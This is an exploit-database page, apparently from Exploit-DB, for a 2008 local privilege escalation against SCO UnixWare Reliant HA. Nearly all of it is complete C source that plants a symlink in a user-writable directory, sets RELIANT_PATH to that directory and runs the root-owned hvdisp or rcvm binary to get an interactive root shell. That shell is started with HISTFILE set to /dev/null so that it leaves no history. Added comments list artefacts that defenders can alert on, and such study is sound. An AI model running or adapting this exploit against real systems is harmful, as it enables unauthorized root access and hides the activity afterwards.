vendor:
UnixWare Reliant HA
by:
qaaz
7.2
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: UnixWare Reliant HA
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: o:sco:unixware_reliant_ha
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: UnixWare
2008

SCO UnixWare Reliant HA Local Root Exploit

This is a local privilege escalation exploit for SCO UnixWare Reliant HA. It lets a local user gain root privileges through a symlink vulnerability in the hvdisp and rcvm binaries. The exploit creates a `bin` directory under its current working directory, places in it a symlink to the current process's a.out file, and then sets the RELIANT_PATH environment variable to the current working directory before executing the hvdisp or rcvm binary, which runs with root privileges.

Mitigation:

The vendor has not released a patch for this vulnerability. The best mitigation is to restrict access to the vulnerable binaries.
Source

Exploit-DB raw data:

/* 04/2008: public release
 * I haven't seen any advisory on this; possibly still not fixed.
 *
 * SCO UnixWare Reliant HA Local Root Exploit
 * By qaaz
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>

#define TGT1	"/usr/opt/reliant/bin/hvdisp"
#define TGT2	"/usr/opt/reliant/bin/rcvm"
#define DIR	"bin"
#define BIN	DIR "/hvenv"

/*
 * Entry point.  The program behaves in one of two ways, chosen by geteuid():
 *
 *   - unprivileged (the normal first run): probes for a target binary,
 *     creates bin/hvenv in the current directory as a symlink to this
 *     process's own executable, then runs the target with RELIANT_PATH
 *     set to the current directory;
 *   - privileged (euid 0): reached when this same program is started again
 *     with root privileges.  Presumably the target resolves bin/hvenv via
 *     RELIANT_PATH and executes it -- the page description says so, but the
 *     target's behaviour is not visible here.  This branch then spawns an
 *     interactive shell on the terminal descriptors saved by the first
 *     instance.
 *
 * Root cause from a defender's view: a privileged program honouring an
 * environment-supplied search path (RELIANT_PATH); the page files it under
 * CWE-264.  Artefacts this code leaves that are worth alerting on: a symlink
 * bin/hvenv -> /proc/<pid>/object/a.out in a user-writable directory,
 * RELIANT_PATH pointing outside the product's install tree, and a child of
 * hvdisp/rcvm running /bin/sh -i with HISTFILE=/dev/null.
 *
 * Build note: waitpid(), mkdir() and kill() are called without
 * <sys/wait.h>, <sys/stat.h> or <signal.h> (see the include list above), so
 * this relies on the original toolchain accepting implicit declarations.
 *
 * argc/argv are unused.  Returns 0 after cleanup on the normal path and 1 on
 * any error; the privileged branch returns 1 once the shell has exited.
 */
int	main(int argc, char *argv[])
{
	char	self[4096], *target;
	pid_t	child;

	/* Privileged re-entry (see the header comment). */
	if (geteuid() == 0) {
		/* Make the real uid match the effective (root) uid; the return
		 * value is not checked. */
		setuid(geteuid());
		/* Descriptors 3-5 are the first instance's stdin/stdout/stderr,
		 * saved by the dup2() calls further down and inherited across
		 * exec; reattach them as 0-2 so the shell talks to the terminal. */
		dup2(3, 0);
		dup2(4, 1);
		dup2(5, 2);
		if ((child = fork()) == 0) {
			/* Anti-forensic: the spawned shell writes no history file. */
			putenv("HISTFILE=/dev/null");
			execl("/bin/sh", "sh", "-i", NULL);
			/* Only reached if execl() failed. */
			printf("[-] sh: %s\n", strerror(errno));
		} else if (child != -1)
			waitpid(child, NULL, 0);
		/* Signal 15 (SIGTERM by convention) to the parent -- presumably the
		 * privileged target that started this instance -- so it does not
		 * linger after the shell exits. */
		kill(getppid(), 15);
		return 1;
	}

	printf("----------------------------------------\n");
	printf(" UnixWare Reliant HA Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("----------------------------------------\n");

	/* Pick whichever target exists.  EX_OK is not a standard access() mode
	 * name (POSIX spells execute permission X_OK); presumably a UnixWare
	 * header defines it -- confirm.  access() tests against the real uid. */
	if (access(TGT1, EX_OK) == 0)
		target = TGT1;
	else if (access(TGT2, EX_OK) == 0)
		target = TGT2;
	else {
		printf("[-] No targets found\n");
		return 1;
	}

	/* Path of this process's own executable image under UnixWare's /proc
	 * (per the page description).  A pid's decimal form fits easily in
	 * the 4096-byte buffer, so the unbounded sprintf() cannot overflow. */
	sprintf(self, "/proc/%d/object/a.out", getpid());

	/* Create ./bin (mode 0777, subject to umask); an existing directory is
	 * tolerated, any other mkdir() failure aborts. */
	if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {
		printf("[-] %s: %s\n", DIR, strerror(errno));
		return 1;
	}

	/* ./bin/hvenv -> this executable.  On failure the directory created
	 * above is removed again. */
	if (symlink(self, BIN) < 0) {
		printf("[-] %s: %s\n", BIN, strerror(errno));
		rmdir(DIR);
		return 1;
	}

	if ((child = fork()) == 0) {
		/* "RELIANT_PATH=" is 13 characters plus the terminator, hence the
		 * sizeof(path)-14 bound handed to getcwd() below. */
		char path[4096] = "RELIANT_PATH=";

		/* Save the terminal descriptors as 3-5 so the privileged
		 * re-execution (top of main) can reclaim them. */
		dup2(0, 3);
		dup2(1, 4);
		dup2(2, 5);
		/* getcwd(NULL, n) allocating its result is a common extension,
		 * not guaranteed by POSIX; a NULL return (e.g. cwd longer than the
		 * bound) would be passed straight to strcat().  The allocation is
		 * never freed, which is moot because exec follows. */
		putenv(strcat(path, getcwd(NULL, sizeof(path)-14)));
		/* Run the target with the attacker-controlled RELIANT_PATH. */
		execl(target, target, NULL);
		/* Only reached if execl() failed. */
		printf("[-] %s: %s\n", target, strerror(errno));
		return 1;
	} else if (child != -1)
		waitpid(child, NULL, 0);

	/* Remove the symlink and directory once the target has returned. */
	unlink(BIN);
	rmdir(DIR);
	return 0;
}

// milw0rm.com [2008-04-04]